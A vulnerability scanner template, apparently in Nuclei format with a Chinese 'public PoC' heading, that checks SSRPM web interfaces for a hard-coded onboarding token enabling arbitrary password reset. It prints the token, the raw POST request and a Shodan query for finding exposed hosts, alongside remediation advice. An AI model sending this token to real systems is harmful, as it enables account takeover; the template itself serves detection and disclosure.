The default installation of the Client Web Interface, which is provided alongside the COM SSRPM service, defines a hard-coded secret token for the Import endpoint. This endpoint allows registering new accounts or overwriting existing onboarding data for an arbitrary account, which ultimately allows changing the password of an arbitrary account.
PoC代码[已公开]
id: ssrpm-arbitrary-password-reset
info:
name: SSRPM - Arbitary Password Reset on Default Client Interface Installation
author: vince-isec
severity: high
description: |
The default installation of the Client Web Interface, which is provided alongside the COM SSRPM service, defines a hard-coded secret token for the Import endpoint. This endpoint allows registering new accounts or overwriting existing onboarding data for an arbitrary account, which ultimately allows changing the password of an arbitrary account.
remediation: Set a new and random value to the OnboardingToken setting. Install the new version of SSRPM and its web interface.
reference:
- https://www.synacktiv.com/advisories/ssrpm-arbitrary-password-reset-on-default-client-web-interface-installation
metadata:
shodan-query: http.favicon.hash:-916902413
max-request: 1
verified: true
tags: ssrpm,intrusive
variables:
string: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST /Onboarding/Import HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
OnboardingToken=7e30bebc-d17c-4833-98b6-d4c09e076b24&Action={{string}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"ErrorCode":-55'
- '"Success":false'
condition: and
- type: word
part: content_type
words:
- 'application/json'
- type: status
status:
- 200
extractors:
- type: kval
kval:
- string
# digest: 4a0a00473045022054e83e4f1c9710635a65d02c970f2aed29064c24cb12ed212b1e797a172c8386022100c72f534f25a61db97c8f0b74c55081a9bde45a33000f03d5b0a51b0b9358889d:922c64590222798bb761d5b6d8e72950